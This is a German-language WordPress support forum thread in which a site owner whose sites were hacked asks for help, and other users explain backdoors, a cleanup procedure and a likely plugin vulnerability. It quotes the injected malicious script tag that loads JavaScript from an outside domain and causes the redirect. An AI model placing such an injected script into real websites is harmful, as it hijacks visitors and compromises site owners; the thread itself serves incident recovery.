Support » Allgemeine Fragen » Seiten verseucht mit script; wer hat Ähnliches?

  • Hallo miteinander,
    Ich habe verschiedene Sites bei zwei verschiedenen Hostern. Bei einem komme ich sowohl im Frontend als auch Backend nicht mehr hinein. Ich lande immer auf folgender Seite: https://redfunchicken.com/?p=mvstqmjwmy5gi3bpgeztmoa&sub2=seller55

    Vom Support erhielt ich folgende Information:

    „Scheinbar sind die genannten Webseiten mit Schadsoftware kompromittiert
    welche diese Weiterleitung beim Aufruf durchführt.

    Ich habe mir dazu einmal die Installationen angeschaut und konnte hier
    feststellen das in den Unterordnern der Installationen jeweils immer
    eine index.php mit folgenden Inhalt hinterlegt ist.

    <script type=’text/javascript‘
    src=’https://dest.collectfasttracks.com/y.js‘></script>&lt;?php

    Hierbei handelt es sich um eine Injektion von einer Weiterleitung.

    Dahingehend wäre es empfehlenswert, falls vorhanden, entsprechende
    Backups der Installationen einzuspielen. Wenn man zu 100% sicher gehen
    will sollte man die Seiten aber neu aufbauen. Da man nie sagen kann ob
    in etwaigen Backups sich bereits schlafender Schadhafter Code befindet.

    Erfahrungsgemäß werden solche Hacks oftmals durch veraltete Plugins,
    Themes oder CMS-Installationen bzw. Webseitenfunktionen aber auch zu
    offene Berechtigungen in der Installation ausgelöst. Dahingehend ist es
    empfehlenswert alle Inhalte immer möglichst aktuell zu halten und auf
    veraltete Funktionen zu verzichten.“

    Jetzt habe ich auf meinen Seiten geschaut und festgestellt, dass
    farbsteinchen.de – auf dem anderen Hoster – ebenfalls dieses Script vorhanden ist. Mit search and Replace habe ich es gelöscht.

    Bei dieser Seite ist es nicht so schlimm, denn sie führt auf eine andere
    Seite, die nicht aufgerufen werden kann.

    An meiner Hauptseite 8ung.info habe ich dieses Script ebenfalls entdeckt, siehe Search ans Replace:
    „Es wurde ein Testlauf durchgeführt. An der Datenbank wurden keine
    Änderungen vorgenommen und es wurde keine SQL-Datei geschrieben.
    66 Tabellen wurden verarbeitet.460 cells need to be updated.“

    Diese Seite funktioniert noch. Allerdings gingen die Klickzahlen in den letzten Monaten dramatisch zurück. Ich wage nicht, das Script zu löschen oder irgendetwas damit zu machen, denn meistens verschlimmbessere ich alles, was mit Technik zu tun hat.
    Diese Site ist mir sehr wichtig!
    Für allinkl ist die Suche zu aufwändig – verständlich.
    Aber was soll ich jetzt machen?
    Wer weiß Rat?

    Lieben gruß
    8ung

    Die Seite, für die ich Hilfe brauche: [Anmelden, um den Link zu sehen]

Ansicht von 4 Antworten - 1 bis 4 (von insgesamt 4)
  • Angreifer hinterlassen oft so genannte Backdoors, also an unauffälligen Stellen platzierte Malware, über die sie jederzeit wieder Zugriff auf den Webserver erlangen können. Die Malware kann dabei (sinngemäß) in eigentlich unverdächtig klingenden Dateien wie wp-includes/settings.php, wp-admin/default.phpoder sogar Bilddateien in wp-content/uploads stecken.

    Grundsätzlich solltest du nach einem Angriff, wenn kein verlässliches Backup mehr vorliegt, die WordPress-Core, -Theme und -Plugin-Dateien löschen und durch frisch heruntergeladene Dateien ersetzen, alle Zugangsdaten ersetzen (WordPress, Datenbank, FTP-Zugang und sogar Zugang zum Kundenmenü des Webhosters), alle skalierten Bilder löschen (alles mit -???x??? im Dateinamen, wobei die Fragezeichen als Platzhalter für die Größe in Pixeln gemeint ist), die verbleibenden Bilder gründlich untersuchen (idealerweise mit grep auf base64-encoding) und mit Regenerate Thumbnails neu skalieren. Eine detaillierte Anleitung habe ich hier mal geschrieben, wenn du nicht lange suchen magst: https://pixolin.de/arbeitsschritte-reparatur-gehackte-website/

    Du wirst nie für deine Websites 100% Sicherheit bekommen, aber du kannst dich mit Backups absichern, die in einem Cloud-Server gespeichert werden und mit denen du eine gehackte Website in wenigen Minuten wiederherstellst. Dann sind Hacks zwar immer noch lästig, verursachen aber nicht so einen bombastischen Aufwand.

    Guten Tag Bego Mario Garde, danke,
    alles schön und gut.

    Das werde ich vielleicht/wahrscheinlich machen.
    Aber ich kann mich nicht einloggen.
    Egal, welche webgo-Seite ich aufrufe, ich werde immer weitergeleitet auf diese URL:
    https://redfunchicken.com/?p=mvstqmjwmy5gi3bpgeztmoa&sub2=seller55

    Ich hatte die falsche URL angegeben, die glücklicherweise nur halbverseucht ist mit 66 Tabellen und 460 cells.

    Eine Auswahl der richtig gehackten Seiten:
    horoskopstein.de
    kunst-hand-werk-shop.de
    8ung-info.de (diese Site ist mein Backup!!!)

    Wie komme ich in meine Accounts?
    Von meinem Hoster habe ich noch keine Information bekommen, seit gestern ist Funkstille.

    Kann ich dieses script auf meiner Hauptseite 8ung.info mit suchen&ersetzen löschen, ohne dass was passiert? So als Notmaßnahme, bevor es sich weiter ausbreitet?

    Lieben Gruß
    Dorle

    Aber ich kann mich nicht einloggen.

    Das hat auch keiner vorgeschlagen.

    Willst du mit der Website weiterarbeiten oder willst du sie reparieren? Für die Reparatur, wie ich sie in meiner Anleitung vorgeschlagen habe, brauchst du dich erst anmelden, wenn du die Dateien ausgetauscht hast.

    In diesem Thread habe ich die Schritte gerade nochmal zusammengefasst:
    https://de.wordpress.org/support/topic/findet-google-malware-besser-als-gaengige-sicherheitsscanner/#post-79906

    Hi,

    hast du bei all-inkl Unteraccounts erstellt, um die Seiten voneinander zu isolieren? Das sollte man immer tun.

    Die collectfasttracks Script Weiterleitung gibt es häufig im Zusammenhang mit der Duplicator Plugin Sicherheitslücke vom Februar.
    Da konnten aus den wp-configs die Datenbank Credentials ausgelesen werden.

    Hast du sämtliche Datenbank Passwörter abgeändert?
    In den all-inkl Datenbank Einstellungen bitte auch sicherstellen, dass der Zugriff nicht von extern erlaubt ist.

    Gruß

    Pascal

Ansicht von 4 Antworten - 1 bis 4 (von insgesamt 4)